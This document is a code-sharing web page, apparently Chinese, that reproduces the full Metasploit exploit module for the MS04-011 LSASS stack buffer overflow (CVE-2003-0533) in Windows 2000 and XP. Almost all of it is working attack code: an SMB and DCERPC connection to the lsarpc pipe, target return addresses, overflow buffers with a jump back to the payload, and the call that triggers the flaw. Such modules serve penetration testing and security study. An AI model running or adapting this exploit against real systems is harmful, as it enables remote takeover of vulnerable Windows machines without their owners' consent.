扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 |
## # $Id: ms04_011_lsass.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # # This module exploits a vulnerability in the LSASS service # include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow', 'Description'=> %q{ This module exploits a stack buffer overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter. }, 'Author' => [ 'hdm' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 9669 $', 'References' => [ [ 'CVE', '2003-0533' ], [ 'OSVDB', '5248' ], [ 'BID', '10108' ], [ 'MSB', 'MS04-011' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload'=> { 'Space'=> 1024, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets'=> [ # Automatic [ 'Automatic Targetting', { 'Rets' => [ ], }, ], # Windows 2000 [ 'Windows 2000 English', { 'Rets' => [ 0x773242e0 ], }, ], # Windows XP [ 'Windows XP English', { 'Rets' => [ 0x7449bf1a ], }, ], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Apr 13 2004')) end def exploit connect() smb_login() handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc']) print_status("Binding to #{handle}...") dcerpc_bind(handle) print_status("Bound to #{handle}...") print_status('Getting OS information...') # Check the remote OS name and version os = smb_peer_os buff = '' case os # Windows 2000 requires that the string be unicode formatted # and give us a nice set of registers which point back to # the un-unicoded data. We simply return to a nop sled that # jumps over the return address, some trash, and into the # final payload. Easy as pie. when /Windows 5\.0/ str = rand_text_alphanumeric(3500) str[2020, 4] = [targets[1]['Rets'][0]].pack('V') str[2104, payload.encoded.length ] = payload.encoded buff = NDR.UnicodeConformantVaryingString(str) # Windows XP is a bit different, we need to use an ascii # buffer and a jmp esp. The esp register points to an # eight byte segment at the end of our buffer in memory, # we make these bytes jump back to the beginning of the # buffer, giving us about 1936 bytes of space for a # payload. when /Windows 5\.1/ str = rand_text_alphanumeric(7000) + "\x00\x00" str[0, payload.encoded.length ] = payload.encoded str[1964, 4] = [targets[2]['Rets'][0]].pack('V') str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload str[6998, 2] = "\x00\x00" buff = NDR.UnicodeConformantVaryingStringPreBuilt(str) # Unsupported target else print_status("No target is available for #{ os }") return end stub = buff + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + rand_text(528) + rand_text(528) + NDR.long(rand(0xFFFFFF)) print_status("Trying to exploit #{os}") begin response = dcerpc_call(9, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse print_status('Server did not respond, but that should be ok...') rescue Rex::Proto::DCERPC::Exceptions::Fault case $!.fault when 0x1c010002 print_status('Server appears to have been patched') else print_status("Unexpected DCERPC fault 0x%.8x" % $!.fault) end end # Perform any required client-side payload handling handler end end |
体验盒子
